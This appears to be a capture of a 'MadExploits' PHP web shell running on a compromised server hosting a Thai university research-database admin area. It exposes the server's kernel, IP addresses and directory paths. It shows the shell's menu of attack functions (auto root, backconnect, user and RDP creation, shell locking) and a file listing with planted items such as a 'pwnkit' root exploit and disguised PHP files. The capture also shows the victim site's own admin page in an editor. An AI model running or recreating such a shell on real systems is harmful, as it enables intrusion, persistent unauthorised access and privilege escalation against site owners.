Linux webstaff 6.12.43+deb12-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.43-1~bpo12+1 (2025-09-06) x86_64
nginx/1.22.1
: 202.29.57.4 | : 216.73.216.61
Cant Read [ /etc/named.conf ]
8.4.15
web2
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
clients /
client2 /
web2 /
web /
ris /
mods /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
admin_act.php
2.88
KB
-rw-r--r--
admin_frm.php
2.6
KB
-rw-r--r--
admin_lst.php
2.56
KB
-rw-r--r--
faculty_act.php
2.79
KB
-rw-r--r--
faculty_frm.php
2.13
KB
-rw-r--r--
faculty_lst.php
2.49
KB
-rw-r--r--
fund_act.php
3.64
KB
-rw-r--r--
fund_frm.php
4.39
KB
-rw-r--r--
fund_lst.php
2.81
KB
-rw-r--r--
innovation_act.php
4.03
KB
-rw-r--r--
innovation_frm.php
5.63
KB
-rw-r--r--
innovation_lst.php
5.11
KB
-rw-r--r--
journal_act.php
2.79
KB
-rw-r--r--
journal_frm.php
2.13
KB
-rw-r--r--
journal_lst.php
2.57
KB
-rw-r--r--
login_act.php
2.04
KB
-rw-r--r--
login_frm.php
1.3
KB
-rw-r--r--
manager-Pipeline.php
584
B
-rw-r--r--
publication_act.php
4.05
KB
-rw-r--r--
publication_frm.php
6.14
KB
-rw-r--r--
publication_lst.php
5.07
KB
-rw-r--r--
publishdb_act.php
2.91
KB
-rw-r--r--
publishdb_frm.php
2.99
KB
-rw-r--r--
publishdb_lst.php
2.89
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
research2_frm.php
8.94
KB
-rw-r--r--
research_act.php
4.21
KB
-rw-r--r--
research_frm.php
9.28
KB
-rw-r--r--
research_lst.php
5.12
KB
-rw-r--r--
researcher_act.php
3.75
KB
-rw-r--r--
researcher_frm.php
4.29
KB
-rw-r--r--
researcher_lst.php
5.09
KB
-rw-r--r--
sanitizer-Client.php
584
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : publishdb_lst.php
<div class="w3-white w3-padding"> <h3><i class="fa fa-university" aria-hidden="true"></i> ฐานข้อมูลตีพิมพ์</h3> <div class="w3-right-align"> <a href="admin.php?mod=publishdb_frm" class="w3-button w3-green w3-round w3-margin-bottom" title="เพิ่มรายการใหม่"><i class="fa fa-plus-square" aria-hidden="true"></i> เพิ่มรายการใหม่</a> </div> <input type="hidden" name="mod" value="<?=$mod?>"> <?php $sql = "SELECT publishdb.* FROM publishdb WHERE 1 "; $sql .= " ORDER BY publishdb.ordering "; $rows = $g_db->getObjects($sql); ?> <?php $g_page->url = "admin.php?mod=publishdb_lst"; //$g_page->show(); ?> <div class="w3-responsive w3-white"> <table class="w3-table w3-border w3-bordered w3-hoverable w3-card-4"> <tr class="w3-light-gray w3-round"> <th class="w3-center" width="50">ลำดับ</th> <th >ชื่อฐานข้อมูล</th> <th class="w3-center">ระดับ</th> <th class="w3-center">ค่าน้ำหนัก</th> <th class="w3-center" width="50">แก้ไข</th> <th class="w3-center" width="50">ลบ</th> </tr> <?php for ($i=0; $i<count($rows); $i++) { $row = $rows[$i]; $level_names = array("1"=>"ระดับชาติ","2"=>"ระดับนานาชาติ"); ?> <tr class="w3-hover-light-grey<?=($row->test=='1')?' w3-pale-red':''?>"> <td class="w3-center"><?=$row->ordering?></td> <td ><?=$row->name?></td> <td class="w3-center"><?=$level_names[$row->level]?></td> <td class="w3-center"><?=$row->weight?></td> <td class="w3-center"><a href="admin.php?mod=publishdb_frm&id=<?=$row->id?>"><i class="fa fa-pencil-square-o w3-text-orange" aria-hidden="true"></i></a></td> <td class="w3-center"><a href="javascript:confirm_delete(<?=$row->id?>, '<?=$row->name?>')"><i class="fa fa-trash-o w3-text-red" aria-hidden="true"></i></a></td> </tr> <?php } ?> </table> </div> <?php //$g_page->show(); ?> <p> </p> </div> <script language="javascript"> function confirm_clear(id, name) { if (confirm("ต้องการล้างข้อมูลแบบสำรวจ รหัส "+name+" ?")) { document.location.href="action.php?mod=publishdb_act&do=clear&department_id=<?=$department_id?>&kw=<?=$kw?>&page=<?=$page?>&id="+id; } } function confirm_delete(id, name) { if (confirm("ต้องการลบ "+name+" ?")) { document.location.href="action.php?mod=publishdb_act&do=delete&id="+id; } } function confirm_status(id, field, status) { if (confirm("ต้องการเปลี่ยนสถานะรายการนี้?")) { document.location.href="action.php?mod=publishdb_act&field="+field+"&do=status&department_id=<?=$department_id?>&page=<?=$page?>&id="+id+"&status="+status; } } </script>
Close